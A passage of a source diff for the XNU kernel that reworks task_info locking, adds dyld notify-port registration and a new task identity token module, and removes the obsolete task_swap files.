pid %d with error: %d\n", + proc_name_address(current_task()->bsd_info), + proc_pid(current_task()->bsd_info), task_pid(task), kr); - return kr; } return kr; @@ -4622,6 +4658,7 @@ task_info( { kern_return_t error = KERN_SUCCESS; mach_msg_type_number_t original_task_info_count; + bool is_kernel_task = (task == kernel_task); if (task == TASK_NULL) { return KERN_INVALID_ARGUMENT; @@ -5135,7 +5172,7 @@ task_info( events_info = (task_events_info_t) task_info_out; - events_info->faults = task->faults; + events_info->faults = (int32_t) MIN(counter_load(&task->faults), INT32_MAX); events_info->pageins = task->pageins; events_info->cow_faults = task->cow_faults; events_info->messages_sent = task->messages_sent; @@ -5233,11 +5270,19 @@ task_info( vm_info = (task_vm_info_t)task_info_out; - if (task == kernel_task) { + /* + * Do not hold both the task and map locks, + * so convert the task lock into a map reference, + * drop the task lock, then lock the map. + */ + if (is_kernel_task) { map = kernel_map; - /* no lock */ + task_unlock(task); + /* no lock, no reference */ } else { map = task->map; + vm_map_reference(map); + task_unlock(task); vm_map_lock_read(map); } @@ -5268,7 +5313,7 @@ task_info( vm_info->purgeable_volatile_pmap = 0; vm_info->purgeable_volatile_resident = 0; vm_info->purgeable_volatile_virtual = 0; - if (task == kernel_task) { + if (is_kernel_task) { /* * We do not maintain the detailed stats for the * kernel_pmap, so just count everything as @@ -5318,16 +5363,41 @@ task_info( } *task_info_count = TASK_VM_INFO_REV0_COUNT; + if (original_task_info_count >= TASK_VM_INFO_REV2_COUNT) { + /* must be captured while we still have the map lock */ + vm_info->min_address = map->min_offset; + vm_info->max_address = map->max_offset; + } + + /* + * Done with vm map things, can drop the map lock and reference, + * and take the task lock back. + * + * Re-validate that the task didn't die on us. + */ + if (!is_kernel_task) { + vm_map_unlock_read(map); + vm_map_deallocate(map); + } + map = VM_MAP_NULL; + + task_lock(task); + + if ((task != current_task()) && (!task->active)) { + error = KERN_INVALID_ARGUMENT; + break; + } + if (original_task_info_count >= TASK_VM_INFO_REV1_COUNT) { vm_info->phys_footprint = (mach_vm_size_t) get_task_phys_footprint(task); *task_info_count = TASK_VM_INFO_REV1_COUNT; } if (original_task_info_count >= TASK_VM_INFO_REV2_COUNT) { - vm_info->min_address = map->min_offset; - vm_info->max_address = map->max_offset; + /* data was captured above */ *task_info_count = TASK_VM_INFO_REV2_COUNT; } + if (original_task_info_count >= TASK_VM_INFO_REV3_COUNT) { ledger_get_lifetime_max(task->ledger, task_ledgers.phys_footprint, @@ -5413,10 +5483,6 @@ task_info( *task_info_count = TASK_VM_INFO_REV5_COUNT; } - if (task != kernel_task) { - vm_map_unlock_read(map); - } - break; } @@ -5560,7 +5626,7 @@ task_info( * checks on task_port. * * In the case of TASK_DYLD_INFO, we require the more - * privileged task_port not the less-privileged task_name_port. + * privileged task_read_port not the less-privileged task_name_port. * */ kern_return_t @@ -5574,7 +5640,7 @@ task_info_from_user( kern_return_t ret; if (flavor == TASK_DYLD_INFO) { - task = convert_port_to_task(task_port); + task = convert_port_to_task_read(task_port); } else { task = convert_port_to_task_name(task_port); } @@ -5586,6 +5652,298 @@ task_info_from_user( return ret; } +/* + * Routine: task_dyld_process_info_update_helper + * + * Release send rights in release_ports. + * + * If no active ports found in task's dyld notifier array, unset the magic value + * in user space to indicate so. + * + * Condition: + * task's itk_lock is locked, and is unlocked upon return. + * Global g_dyldinfo_mtx is locked, and is unlocked upon return. + */ +void +task_dyld_process_info_update_helper( + task_t task, + size_t active_count, + vm_map_address_t magic_addr, /* a userspace address */ + ipc_port_t *release_ports, + size_t release_count) +{ + void *notifiers_ptr = NULL; + + assert(release_count <= DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT); + + if (active_count == 0) { + assert(task->itk_dyld_notify != NULL); + notifiers_ptr = task->itk_dyld_notify; + task->itk_dyld_notify = NULL; + itk_unlock(task); + + kfree(notifiers_ptr, (vm_size_t)sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT); + (void)copyoutmap_atomic32(task->map, MACH_PORT_NULL, magic_addr); /* unset magic */ + } else { + itk_unlock(task); + (void)copyoutmap_atomic32(task->map, (mach_port_name_t)DYLD_PROCESS_INFO_NOTIFY_MAGIC, + magic_addr); /* reset magic */ + } + + lck_mtx_unlock(&g_dyldinfo_mtx); + + for (size_t i = 0; i < release_count; i++) { + ipc_port_release_send(release_ports[i]); + } +} + +/* + * Routine: task_dyld_process_info_notify_register + * + * Insert a send right to target task's itk_dyld_notify array. Allocate kernel + * memory for the array if it's the first port to be registered. Also cleanup + * any dead rights found in the array. + * + * Consumes sright if returns KERN_SUCCESS, otherwise MIG will destroy it. + * + * Args: + * task: Target task for the registration. + * sright: A send right. + * + * Returns: + * KERN_SUCCESS: Registration succeeded. + * KERN_INVALID_TASK: task is invalid. + * KERN_INVALID_RIGHT: sright is invalid. + * KERN_DENIED: Security policy denied this call. + * KERN_RESOURCE_SHORTAGE: Kernel memory allocation failed. + * KERN_NO_SPACE: No available notifier port slot left for this task. + * KERN_RIGHT_EXISTS: The notifier port is already registered and active. + * + * Other error code see task_info(). + * + * See Also: + * task_dyld_process_info_notify_get_trap() in mach_kernelrpc.c + */ +kern_return_t +task_dyld_process_info_notify_register( + task_t task, + ipc_port_t sright) +{ + struct task_dyld_info dyld_info; + mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT; + ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + uint32_t release_count = 0, active_count = 0; + mach_vm_address_t ports_addr; /* a user space address */ + kern_return_t kr; + boolean_t right_exists = false; + ipc_port_t *notifiers_ptr = NULL; + ipc_port_t *portp; + + if (task == TASK_NULL || task == kernel_task) { + return KERN_INVALID_TASK; + } + + if (!IP_VALID(sright)) { + return KERN_INVALID_RIGHT; + } + +#if CONFIG_MACF + if (mac_task_check_dyld_process_info_notify_register()) { + return KERN_DENIED; + } +#endif + + kr = task_info(task, TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count); + if (kr) { + return kr; + } + + if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user32_dyld_all_image_infos, notifyMachPorts)); + } else { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user64_dyld_all_image_infos, notifyMachPorts)); + } + + if (task->itk_dyld_notify == NULL) { + notifiers_ptr = (ipc_port_t *) + kalloc_flags(sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT, Z_ZERO); + if (!notifiers_ptr) { + return KERN_RESOURCE_SHORTAGE; + } + } + + lck_mtx_lock(&g_dyldinfo_mtx); + itk_lock(task); + + if (task->itk_dyld_notify == NULL) { + task->itk_dyld_notify = notifiers_ptr; + notifiers_ptr = NULL; + } + + assert(task->itk_dyld_notify != NULL); + /* First pass: clear dead names and check for duplicate registration */ + for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) { + portp = &task->itk_dyld_notify[slot]; + if (*portp != IPC_PORT_NULL && !ip_active(*portp)) { + release_ports[release_count++] = *portp; + *portp = IPC_PORT_NULL; + } else if (*portp == sright) { + /* the port is already registered and is active */ + right_exists = true; + } + + if (*portp != IPC_PORT_NULL) { + active_count++; + } + } + + if (right_exists) { + /* skip second pass */ + kr = KERN_RIGHT_EXISTS; + goto out; + } + + /* Second pass: register the port */ + kr = KERN_NO_SPACE; + for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) { + portp = &task->itk_dyld_notify[slot]; + if (*portp == IPC_PORT_NULL) { + *portp = sright; + active_count++; + kr = KERN_SUCCESS; + break; + } + } + +out: + assert(active_count > 0); + + task_dyld_process_info_update_helper(task, active_count, + (vm_map_address_t)ports_addr, release_ports, release_count); + /* itk_lock, g_dyldinfo_mtx are unlocked upon return */ + + if (notifiers_ptr) { + kfree(notifiers_ptr, sizeof(ipc_port_t) * DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT); + } + + return kr; +} + +/* + * Routine: task_dyld_process_info_notify_deregister + * + * Remove a send right in target task's itk_dyld_notify array matching the receive + * right name passed in. Deallocate kernel memory for the array if it's the last port to + * be deregistered, or all ports have died. Also cleanup any dead rights found in the array. + * + * Does not consume any reference. + * + * Args: + * task: Target task for the deregistration. + * rcv_name: The name denoting the receive right in caller's space. + * + * Returns: + * KERN_SUCCESS: A matching entry found and degistration succeeded. + * KERN_INVALID_TASK: task is invalid. + * KERN_INVALID_NAME: name is invalid. + * KERN_DENIED: Security policy denied this call. + * KERN_FAILURE: A matching entry is not found. + * KERN_INVALID_RIGHT: The name passed in does not represent a valid rcv right. + * + * Other error code see task_info(). + * + * See Also: + * task_dyld_process_info_notify_get_trap() in mach_kernelrpc.c + */ +kern_return_t +task_dyld_process_info_notify_deregister( + task_t task, + mach_port_name_t rcv_name) +{ + struct task_dyld_info dyld_info; + mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT; + ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + uint32_t release_count = 0, active_count = 0; + boolean_t port_found = false; + mach_vm_address_t ports_addr; /* a user space address */ + ipc_port_t sright; + kern_return_t kr; + ipc_port_t *portp; + + if (task == TASK_NULL || task == kernel_task) { + return KERN_INVALID_TASK; + } + + if (!MACH_PORT_VALID(rcv_name)) { + return KERN_INVALID_NAME; + } + +#if CONFIG_MACF + if (mac_task_check_dyld_process_info_notify_register()) { + return KERN_DENIED; + } +#endif + + kr = task_info(task, TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count); + if (kr) { + return kr; + } + + if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user32_dyld_all_image_infos, notifyMachPorts)); + } else { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user64_dyld_all_image_infos, notifyMachPorts)); + } + + kr = ipc_port_translate_receive(current_space(), rcv_name, &sright); /* does not produce port ref */ + if (kr) { + return KERN_INVALID_RIGHT; + } + + ip_reference(sright); + ip_unlock(sright); + + assert(sright != IPC_PORT_NULL); + + lck_mtx_lock(&g_dyldinfo_mtx); + itk_lock(task); + + if (task->itk_dyld_notify == NULL) { + itk_unlock(task); + lck_mtx_unlock(&g_dyldinfo_mtx); + ip_release(sright); + return KERN_FAILURE; + } + + for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) { + portp = &task->itk_dyld_notify[slot]; + if (*portp == sright) { + release_ports[release_count++] = *portp; + *portp = IPC_PORT_NULL; + port_found = true; + } else if ((*portp != IPC_PORT_NULL && !ip_active(*portp))) { + release_ports[release_count++] = *portp; + *portp = IPC_PORT_NULL; + } + + if (*portp != IPC_PORT_NULL) { + active_count++; + } + } + + task_dyld_process_info_update_helper(task, active_count, + (vm_map_address_t)ports_addr, release_ports, release_count); + /* itk_lock, g_dyldinfo_mtx are unlocked upon return */ + + ip_release(sright); + + return port_found ? KERN_SUCCESS : KERN_FAILURE; +} + /* * task_power_info * diff --git a/osfmk/kern/task.h b/osfmk/kern/task.h index d74ddc935..266ea4ce9 100644 --- a/osfmk/kern/task.h +++ b/osfmk/kern/task.h @@ -98,6 +98,7 @@ #ifdef XNU_KERNEL_PRIVATE #include #include +#include #include #include #endif /* XNU_KERNEL_PRIVATE */ @@ -152,11 +153,12 @@ struct task_watchports; struct task { /* Synchronization/destruction information */ - decl_lck_mtx_data(, lock); /* Task's lock */ + decl_lck_mtx_data(, lock); /* Task's lock */ os_refcnt_t ref_count; /* Number of references to me */ - boolean_t active; /* Task has not been terminated */ - boolean_t halting; /* Task is being halted */ - boolean_t message_app_suspended; /* Let iokit know when pidsuspended */ + bool active; /* Task has not been terminated */ + bool ipc_active; /* IPC with the task ports is allowed */ + bool halting; /* Task is being halted */ + bool message_app_suspended; /* Let iokit know when pidsuspended */ /* Virtual timers */ uint32_t vtimers; @@ -207,19 +209,21 @@ struct task { * Different flavors of task port. * These flavors TASK_FLAVOR_* are defined in mach_types.h */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_self") itk_self[TASK_SELF_PORT_COUNT]; /* does not hold right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_settable_self") itk_settable_self; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_ports") itk_task_ports[TASK_SELF_PORT_COUNT]; + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_settable_self") itk_settable_self; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_self") itk_self; /* immovable/pinned task port, does not hold right */ struct exception_action exc_actions[EXC_TYPES_COUNT]; /* a send right each valid element */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_host") itk_host; /* a send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_bootstrap") itk_bootstrap; /* a send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_seatbelt") itk_seatbelt; /* a send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_gssd") itk_gssd; /* yet another send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_debug_control") itk_debug_control; /* send right for debugmode communications */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_access") itk_task_access; /* and another send right */ - struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_resume") itk_resume; /* a receive right to resume this task */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_host") itk_host; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_bootstrap") itk_bootstrap; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_seatbelt") itk_seatbelt; /* a send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_gssd") itk_gssd; /* yet another send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_debug_control") itk_debug_control; /* send right for debugmode communications */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_task_access") itk_task_access; /* and another send right */ + struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_resume") itk_resume; /* a receive right to resume this task */ struct ipc_port * XNU_PTRAUTH_SIGNED_PTR("task.itk_registered") itk_registered[TASK_PORT_REGISTER_MAX]; /* all send rights */ + ipc_port_t * XNU_PTRAUTH_SIGNED_PTR("task.itk_dyld_notify") itk_dyld_notify; /* lazy send rights array of size DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT */ struct ipc_space * XNU_PTRAUTH_SIGNED_PTR("task.itk_space") itk_space; @@ -233,7 +237,7 @@ struct task { MACHINE_TASK - integer_t faults; /* faults counter */ + counter_t faults; /* faults counter */ integer_t decompressions; /* decompression counter */ integer_t pageins; /* pageins counter */ integer_t cow_faults; /* copy on write fault counter */ @@ -478,6 +482,8 @@ struct task { #if CONFIG_PHYS_WRITE_ACCT uint64_t task_fs_metadata_writes; #endif /* CONFIG_PHYS_WRITE_ACCT */ + uint32_t task_shared_region_slide; /* cached here to avoid locking during telemetry */ + uuid_t task_shared_region_uuid; }; /* @@ -595,6 +601,14 @@ task_watchport_elem_deallocate( extern boolean_t task_has_watchports(task_t task); +void +task_dyld_process_info_update_helper( + task_t task, + size_t active_count, + vm_map_address_t magic_addr, + ipc_port_t *release_ports, + size_t release_count); + #else /* MACH_KERNEL_PRIVATE */ __BEGIN_DECLS @@ -1047,6 +1061,7 @@ extern boolean_t get_task_frozen(task_t); /* Convert from a task to a port */ extern ipc_port_t convert_task_to_port(task_t); +extern ipc_port_t convert_task_to_port_pinned(task_t); extern ipc_port_t convert_task_name_to_port(task_name_t); extern ipc_port_t convert_task_inspect_to_port(task_inspect_t); extern ipc_port_t convert_task_read_to_port(task_read_t); diff --git a/osfmk/kern/task_ident.c b/osfmk/kern/task_ident.c new file mode 100644 index 000000000..71802c5d9 --- /dev/null +++ b/osfmk/kern/task_ident.c @@ -0,0 +1,250 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +struct proc_ident { + uint64_t p_uniqueid; + pid_t p_pid; + int p_idversion; +}; + +extern void* proc_find_ident(struct proc_ident const *i); +extern int proc_rele(void* p); +extern task_t proc_task(void* p); +extern struct proc_ident proc_ident(void* p); +extern kern_return_t task_conversion_eval(task_t caller, task_t victim); + +struct task_id_token { + struct proc_ident ident; + ipc_port_t port; + os_refcnt_t tidt_refs; +}; + +static ZONE_DECLARE(task_id_token_zone, "task_id_token", + sizeof(struct task_id_token), ZC_ZFREE_CLEARMEM); + +static void +tidt_reference(task_id_token_t token) +{ + if (token == TASK_ID_TOKEN_NULL) { + return; + } + os_ref_retain(&token->tidt_refs); +} + +static void +tidt_release(task_id_token_t token) +{ + ipc_port_t port; + + if (token == TASK_ID_TOKEN_NULL) { + return; + } + + if (os_ref_release(&token->tidt_refs) > 0) { + return; + } + + /* last ref */ + port = token->port; + + require_ip_active(port); + assert(!port->ip_srights); + ipc_port_dealloc_kernel(port); + + zfree(task_id_token_zone, token); +} + +void +task_id_token_release(task_id_token_t token) +{ + tidt_release(token); +} + +void +task_id_token_notify(mach_msg_header_t *msg) +{ + assert(msg->msgh_id == MACH_NOTIFY_NO_SENDERS); + + mach_no_senders_notification_t *not = (mach_no_senders_notification_t *)msg; + ipc_port_t port = not->not_header.msgh_remote_port; + task_id_token_t token = ip_get_kobject(port); + + require_ip_active(port); + assert(IKOT_TASK_ID_TOKEN == ip_kotype(port)); + assert(port->ip_srights == 0); + + tidt_release(token); /* consumes ref given by notification */ +} + +kern_return_t +task_create_identity_token( + task_t task, + task_id_token_t *tokenp) +{ + task_id_token_t token; + + if (task == TASK_NULL || task == kernel_task) { + return KERN_INVALID_ARGUMENT; + } + + token = zalloc_flags(task_id_token_zone, Z_ZERO | Z_WAITOK | Z_NOFAIL); + + task_lock(task); + if (task->bsd_info) { + token->port = IP_NULL; + token->ident = proc_ident(task->bsd_info); + /* this reference will be donated to no-senders notification */ + os_ref_init_count(&token->tidt_refs, NULL, 1); + } else { + task_unlock(task); + zfree(task_id_token_zone, token); + return KERN_INVALID_ARGUMENT; + } + task_unlock(task); + + *tokenp = token; + + return KERN_SUCCESS; +} + +kern_return_t +task_identity_token_get_task_port( + task_id_token_t token, + task_flavor_t flavor, + ipc_port_t *portp) +{ + int which; + task_t task; + kern_return_t kr; + + if (token == TASK_ID_TOKEN_NULL) { + return KERN_INVALID_ARGUMENT; + } + + switch (flavor) { + case TASK_FLAVOR_NAME: + which = TASK_NAME_PORT; + break; + case TASK_FLAVOR_INSPECT: + which = TASK_INSPECT_PORT; + break; + case TASK_FLAVOR_READ: + which = TASK_READ_PORT; + break; + case TASK_FLAVOR_CONTROL: + which = TASK_KERNEL_PORT; + break; + default: + return KERN_INVALID_ARGUMENT; + } + + void* p = proc_find_ident(&token->ident); + if (p == NULL) { + return KERN_INVALID_ARGUMENT; + } + task = proc_task(p); + task_reference(task); + proc_rele(p); + + if (task == TASK_NULL) { + return KERN_INVALID_ARGUMENT; + } + + if (flavor == TASK_FLAVOR_CONTROL && task == current_task()) { + *portp = convert_task_to_port_pinned(task); /* consumes task ref */ + return KERN_SUCCESS; + } + if (flavor <= TASK_FLAVOR_INSPECT && task_conversion_eval(current_task(), task)) { + task_deallocate(task); + return KERN_INVALID_ARGUMENT; + } + +#if CONFIG_MACF + if (task != current_task()) { + if (mac_task_check_task_id_token_get_task(task, flavor)) { + task_deallocate(task); + return KERN_DENIED; + } + } +#endif + + kr = task_get_special_port(task, which, portp); + task_deallocate(task); + return kr; +} + +/* Produces token ref */ +task_id_token_t +convert_port_to_task_id_token( + ipc_port_t port) +{ + task_id_token_t token = TASK_ID_TOKEN_NULL; + + if (IP_VALID(port)) { + ip_lock(port); + if (ip_active(port)) { + if (ip_kotype(port) == IKOT_TASK_ID_TOKEN) { + token = (task_id_token_t)ip_get_kobject(port); + + zone_require(task_id_token_zone, token); + tidt_reference(token); + } + } + ip_unlock(port); + } + return token; +} + +/* Consumes token ref */ +ipc_port_t +convert_task_id_token_to_port( + task_id_token_t token) +{ + boolean_t kr; + + if (token == TASK_ID_TOKEN_NULL) { + return IP_NULL; + } + + zone_require(task_id_token_zone, token); + + kr = ipc_kobject_make_send_lazy_alloc_port(&token->port, + (ipc_kobject_t) token, IKOT_TASK_ID_TOKEN, IPC_KOBJECT_ALLOC_NONE, false, 0); + assert(kr == TRUE); /* no-senders notification is armed, consumes token ref */ + + return token->port; +} diff --git a/osfmk/kern/task_ident.h b/osfmk/kern/task_ident.h new file mode 100644 index 000000000..5d3bee136 --- /dev/null +++ b/osfmk/kern/task_ident.h @@ -0,0 +1,55 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +/* + * + * A task identity token represents the identity of a mach task without carrying task + * access capabilities. In applicable scenarios, task identity token can be moved between + * tasks and be upgraded to desired level of task port flavor (namely, task name port, + * inspect port, read port or control port) upon use. + * + */ + +#ifndef _KERN_TASK_IDENT_H +#define _KERN_TASK_IDENT_H + +#if XNU_KERNEL_PRIVATE + +#include +#include + +void task_id_token_notify(mach_msg_header_t *msg); +void task_id_token_release(task_id_token_t token); + +ipc_port_t convert_task_id_token_to_port(task_id_token_t token); + +task_id_token_t convert_port_to_task_id_token(ipc_port_t port); + +#endif /* XNU_KERNEL_PRIVATE */ + +#endif /* _KERN_TASK_IDENT_H */ diff --git a/osfmk/kern/task_policy.c b/osfmk/kern/task_policy.c index 4423fd077..b96642803 100644 --- a/osfmk/kern/task_policy.c +++ b/osfmk/kern/task_policy.c @@ -3177,10 +3177,9 @@ task_removewatchers(task_t task) queue_head_t queue; task_watch_t *twp; - queue_init(&queue); - task_watch_lock(); - movqueue(&queue, &task->task_watchers); + queue_new_head(&task->task_watchers, &queue, task_watch_t *, tw_links); + queue_init(&task->task_watchers); queue_iterate(&queue, twp, task_watch_t *, tw_links) { /* @@ -3193,7 +3192,8 @@ task_removewatchers(task_t task) task->num_taskwatchers = 0; task_watch_unlock(); - while ((twp = qe_dequeue_head(&task->task_watchers, task_watch_t, tw_links)) != NULL) { + while (!queue_empty(&queue)) { + queue_remove_first(&queue, twp, task_watch_t *, tw_links); /* remove thread and network bg */ set_thread_appbg(twp->tw_thread, 0, twp->tw_importance); thread_deallocate(twp->tw_thread); diff --git a/osfmk/kern/task_swap.c b/osfmk/kern/task_swap.c deleted file mode 100644 index 42a731856..000000000 --- a/osfmk/kern/task_swap.c +++ /dev/null @@ -1,76 +0,0 @@ -/* - * Copyright (c) 2000-2004 Apple Computer, Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * @OSF_COPYRIGHT@ - */ -/* - * File: kern/task_swap.c - * - * Task residency management primitives implementation. - */ -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include /* We use something from in here */ - -/* - * task_swappable: [exported] - * - * Make a task swappable or non-swappable. If made non-swappable, - * it will be swapped in. - */ -kern_return_t -task_swappable( - host_priv_t host_priv, - task_t task, - __unused boolean_t make_swappable) -{ - if (host_priv == HOST_PRIV_NULL) { - return KERN_INVALID_ARGUMENT; - } - - if (task == TASK_NULL) { - return KERN_INVALID_ARGUMENT; - } - - /* - * We don't support swapping, this call is purely advisory. - */ - return KERN_SUCCESS; -} diff --git a/osfmk/kern/task_swap.h b/osfmk/kern/task_swap.h deleted file mode 100644 index 5972ca36e..000000000 --- a/osfmk/kern/task_swap.h +++ /dev/null @@ -1,135 +0,0 @@ -/* - * Copyright (c) 2000 Apple Computer, Inc. All rights reserved. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. The rights granted to you under the License - * may not be used to create, or enable the creation or redistribution of, - * unlawful or unlicensed copies of an Apple operating system, or to - * circumvent, violate, or enable the circumvention or violation of, any - * terms of an Apple operating system software license agreement. - * - * Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ - */ -/* - * @OSF_COPYRIGHT@ - */ -/* - * HISTORY - * - * Revision 1.1.1.1 1998/09/22 21:05:32 wsanchez - * Import of Mac OS X kernel (~semeria) - * - * Revision 1.1.1.1 1998/03/07 02:25:56 wsanchez - * Import of OSF Mach kernel (~mburg) - * - * Revision 1.1.4.1 1995/04/07 19:02:38 barbou - * Merged into mainline. - * [95/03/09 barbou] - * - * Revision 1.1.2.2 1995/02/13 15:35:45 barbou - * Merged/ported to MK6. - * - * Revision 1.1.1.3 94/08/12 15:44:39 barbou - * VM Merge - Task Swapper. - * - * Changed host_priv_t into host_t. - * [94/07/28 barbou] - * - * Revision 1.1.1.2 1994/07/28 15:33:46 barbou - * Copied from IK. - * - * Revision 3.0.3.2 1994/01/20 19:53:01 chasb - * Remove excessively restrictive copyright notice - * [1994/01/20 17:50:40 chasb] - * - * Revision 3.0.3.1 1993/12/20 21:06:49 gupta - * Expanded C O P Y R I G H T - * [1993/12/17 22:19:22 gupta] - * - * Revision 3.0 1992/12/31 22:08:24 ede - * Initial revision for OSF/1 R1.3 - * - * Revision 1.1.4.5 1992/03/16 18:02:52 gmf - * Add TASK_SW_ELIGIBLE flag to swap_flags; prototype - * task_swapout_eligible, task_swapout_ineligible. - * [1992/02/12 22:01:48 gmf] - * - * Revision 1.1.4.4 1992/01/22 22:14:13 gmf - * Change prototype for task_swappable() to use host_priv_t - * instead of host_t. - * [1992/01/17 17:48:13 gmf] - * - * Revision 1.1.4.3 1991/12/10 17:20:55 gmf - * Add extern declaration for new thread. - * Changed TASK_SW_WAIT flag to TASK_SW_WANT_IN. - * [1991/12/10 16:19:10 gmf] - * - * Revision 1.1.4.2 1991/11/21 21:48:35 mmp - * initial task swapping code - * [1991/11/21 21:01:37 mmp] - * - * $EndLog$ - */ - -/* - * 